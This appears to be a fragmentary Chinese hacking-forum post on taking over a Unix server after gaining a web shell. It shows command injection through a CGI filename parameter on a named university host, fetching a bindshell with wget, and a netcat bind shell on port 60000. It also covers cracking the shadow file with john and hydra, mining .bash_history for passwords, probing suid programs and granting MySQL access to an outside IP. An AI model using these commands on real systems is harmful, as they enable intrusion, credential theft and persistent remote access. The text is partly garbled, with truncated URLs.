大部分技巧來源于我家學(xué)究天人的eong大大
用wget把bindshell下載到/tmp/目錄下
或者再/etc/inetd.conf可寫的情況下直接開一個交互的shell
然后用gcc編譯
_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|ls -al" rel=nofollow>http://cgiserver.sogang.ac.kr/~gsvi...ilename=rb9.txt|ls -al|
ls -al顯示文件

||中間的是顯示的命令
很簡單的辦法是得到用戶

1。我是說用hydra猜測密碼，思路混亂的時候打成john跑shadow了。你可能有疑問，有了shell，為什么還要跑普通用戶的密碼（root經(jīng)常是不能登陸的）。主要是為了查看.bash_history和其他資料，以及獲取一個能夠通過ssh/ftp/telnet 登陸的賬號。也要考慮到proftpd_0day 之類的是需要一個能夠正常登陸的賬號的。沒有這個webshell我也不會跑了，因為我連用戶名(/etc/passwd)都不知道。.bash_history很可能已經(jīng)包括了你所需要的user/pass.例如mysql的，還包括了管理員通常會訪問的其他服務(wù)器。當(dāng)然不是所有機(jī)器的訪問限制都那么嚴(yán)格。/home對nobody來說也是經(jīng)常可讀的。可是我們必須考慮所有情況。
2。如果你所知道的所有的vul都被補(bǔ)上了，面對所有的suid你都無能為力的時候。也許通過一個可以su -的賬號你可以騙出root權(quán)限。
3。對于我個人來說，用john跑shadow是為了完善我自己的密碼/密碼規(guī)則庫。
4。我從來沒有把netcat和pipe 結(jié)合一起使用過，沒有經(jīng)驗。也請你指教一下。
To blackfox:
搜索suid是有必要的，原因嘛。。不單純是為了exploit一個suid程序，也反映了管理員的安全意識層次嘛。當(dāng)然也許這年頭還會有suidshell的存在。

exec`nc -l -n -p 60000 -e /bin/sh`
nc下載地址：http://www.leftworld.net/download/show?id=316.html

mysql的ip禁止連接的打開方法：
find / -name my.cnf -print
mysql> grant all on *.* to username@IP identified by 'password';

最新評論